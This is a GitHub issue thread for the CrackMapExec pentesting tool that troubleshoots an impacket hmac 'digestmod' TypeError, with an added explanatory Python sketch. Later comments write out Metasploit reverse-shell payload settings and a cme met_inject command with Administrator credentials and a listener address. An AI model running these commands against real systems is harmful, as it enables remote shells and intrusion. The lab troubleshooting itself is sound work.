byt3bl33d3r / CrackMapExec

A swiss army knife for pentesting networks
BSD 2-Clause "Simplified" License

cme 5.0.1 impacket modules fails #355

Closed n0bl1nk closed 4 years ago

n0bl1nk commented 4 years ago

DESCRIPTION: cme 5.0.1 impacket modules errors.

COMMAND: crackmapexec smb 192.168.211.10 -u admin -p 'admin'

OUTPUT:

g:True) (SMBv1:False)
Traceback (most recent call last):
  File "src/gevent/greenlet.py", line 766, in gevent._greenlet.Greenlet.run
  File "/usr/lib/python3/dist-packages/cme/protocols/smb.py", line 110, in __init__
    connection.__init__(self, args, db, host)
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 42, in __init__
    self.proto_flow()
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 74, in proto_flow
    self.login()
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 215, in login
    if self.plaintext_login(self.domain, user, password): return True
  File "/usr/lib/python3/dist-packages/cme/protocols/smb.py", line 250, in plaintext_login
    self.conn.login(username, password, domain)
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 267, in login
    return self._SMBConnection.login(user, password, domain, lmhash, nthash)
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 778, in login
    type3, exportedSessionKey = ntlm.getNTLMSSPType3(auth, respToken['ResponseToken'], user, password, domain, lmhash, nthash)
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 631, in getNTLMSSPType3
    ntResponse, lmResponse, sessionBaseKey = computeResponse(ntlmChallenge['flags'], ntlmChallenge['challenge'],
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 39, in computeResponse
    return computeResponseNTLMv2(flags, serverChallenge, clientChallenge, serverName, domain, user, password,
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 902, in computeResponseNTLMv2
    responseKeyNT = NTOWFv2(user, password, domain, nthash)
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 891, in NTOWFv2
    return hmac_md5(theHash, user.upper().encode('utf-16le') + domain.encode('utf-16le'))
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 882, in hmac_md5
    h = hmac.new(key)
  File "/usr/lib/python3.8/hmac.py", line 153, in new
    return HMAC(key, msg, digestmod)
  File "/usr/lib/python3.8/hmac.py", line 51, in __init__
    raise TypeError("Missing required parameter 'digestmod'.")
TypeError: Missing required parameter 'digestmod'.
2020-04-29T00:44:05Z <Greenlet at 0x7f1511cbb370: smb(Namespace(clear_obfscripts=False, content=False, c, <protocol.database object at 0x7f1511d0b1f0>, '192.168.211.10')> failed with TypeError
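
Added example, not part of the original thread and not impacket's own code: the traceback above ends in `hmac.new(key)` with no `digestmod`, a call that Python 3.8 and later reject. The sketch below reproduces that call shape next to a helper that names MD5 explicitly; the function names are hypothetical and the NT hash is a sample input (the hash of "Password" used in the MS-NLMP test values).

```python
import hashlib
import hmac
import sys

# hmac.new() requires digestmod since Python 3.8 (the interpreter in the traceback).
DIGESTMOD_REQUIRED = sys.version_info >= (3, 8)

# Sample input for illustration only: NT hash of "Password".
SAMPLE_NT_HASH = bytes.fromhex("a4f49c406510bdcab6824ee7c30fd852")


def hmac_md5_legacy(key: bytes, data: bytes) -> bytes:
    """Call shape from the traceback: the digest is left implicit."""
    h = hmac.new(key)  # TypeError on Python >= 3.8
    h.update(data)
    return h.digest()


def hmac_md5(key: bytes, data: bytes) -> bytes:
    """Same helper with the digest named explicitly; works on any Python 3."""
    return hmac.new(key, data, digestmod=hashlib.md5).digest()


def ntowfv2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 response key: HMAC-MD5(NT hash, UTF-16LE(upper(user) + domain))."""
    identity = user.upper().encode("utf-16le") + domain.encode("utf-16le")
    return hmac_md5(nt_hash, identity)


def legacy_call_fails() -> bool:
    """True when the implicit-digest call raises, as it does in the report."""
    try:
        hmac_md5_legacy(SAMPLE_NT_HASH, b"data")
    except TypeError:
        return True
    return False


if __name__ == "__main__":
    print("legacy call fails:", legacy_call_fails())
    print("NTOWFv2:", ntowfv2(SAMPLE_NT_HASH, "User", "Domain").hex())
```

Running `python3 -c "import sys, impacket; print(sys.version, impacket.__file__)"` inside the environment that fails shows which interpreter and which impacket copy are actually loaded, which is the difference between the apt install and the GitHub release discussed below.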

blshkv commented 4 years ago

can't confirm it:

bash$ python-test-env/bin/crackmapexec smb 10.0.0.110 -u admin -p 'admin'
SMB         10.0.0.110      445    LAPTOP-HRJ9REOB  [*] Windows 10.0 Build 18362 x64 (name:LAPTOP-HRJ9REOB) (domain:LAPTOP-HRJ9REOB) (signing:False) (SMBv1:False)
SMB         10.0.0.110      445    LAPTOP-HRJ9REOB  [-] LAPTOP-HRJ9REOB\admin:admin STATUS_LOGON_FAILURE 
(python-test-env)

n0bl1nk commented 4 years ago

5.0.1 version: [image: issu22]

n0bl1nk commented 4 years ago

I was using 4.0.1 version, but I installed 5.0.1 version because I can't get reverse shell with "met_inject" and "empire_exec" in 4.0.1 version.

Authentication is successful in 4.0.1 version: [image: issu33]

blshkv commented 4 years ago

Try to test it in Pentoo ;-) Just kidding. I have tested with valid credentials, still can't confirm it. Please install it in a virtualenv and test in a "clean" env.

n0bl1nk commented 4 years ago

Do you have any idea why I can't get a reverse shell in the 4.0.1 version? I succeed using psexec on Metasploit.

set payload windows/meterpreter/reverse_https
set LHOST 192.168.211.136
set LPORT 4444

cme smb 192.168.211.10 -u Administrator -p 'Password' -M met_inject -o LHOST=192.168.211.136 LPORT=4444

[image: issu55]

But I can't get a session.

If I set windows/meterpreter/reverse_tcp, it triggers but the session dies.

blshkv commented 4 years ago

4.0.1 was never officially released, so I have no idea where it came from. Anyway, there were a lot of changes recently, so you should really use the latest.

n0bl1nk commented 4 years ago

Okay, thank you :)

samuelkneppel commented 4 years ago

FWIW, I am also receiving the same error on the same version on my Kali install. I also tried using a venv and received the same error within.

mpgn commented 4 years ago

Unfortunately I cannot reproduce this. Please include more details: did you compile the binary yourself? Did you take it from the release version?

n0bl1nk commented 4 years ago

setup: apt-get install crackmapexec

error when I run the command: [image: issu77]

Kali version: [image: issu66]

mpgn commented 4 years ago

Thanks @n0bl1nk, can you test using this release?

https://github.com/byt3bl33d3r/CrackMapExec/releases/tag/v5.0.1dev

n0bl1nk commented 4 years ago

I am installing a new Kali, I will re-install and report on it.

Cryo2 commented 4 years ago

Hello, same issue with the latest Kali release.

I have this error message only for (Pwn3d!) user.

I will try with the new release.

mpgn commented 4 years ago

OK, please use the latest version from GitHub, not the one from apt; we cannot change code on the apt version ;)

Cryo2 commented 4 years ago

Working, thank you :)

mpgn commented 4 years ago

Waiting for @n0bl1nk and closing if working

n0bl1nk commented 4 years ago

https://github.com/byt3bl33d3r/CrackMapExec/releases/tag/v5.0.1dev is working

But I still can't get a reverse shell with met_inject and empire_exec. Why? There is a section in my blog post where I mention cme, and I want to solve it.

empire_exec: [image: issu10000]

met_inject: [image: issu99]

After running the commands, Metasploit listener: [image: issu101]

Empire listener: [image: issu202]

Target system: Windows 2012 R2. I can successfully log in with Metasploit psexec.

cme can successfully do these and similar commands:

[image: issu303]

[image: issu404]

mpgn commented 4 years ago

I reference your problem with Metasploit as a new issue, @n0bl1nk:

https://github.com/byt3bl33d3r/CrackMapExec/issues/357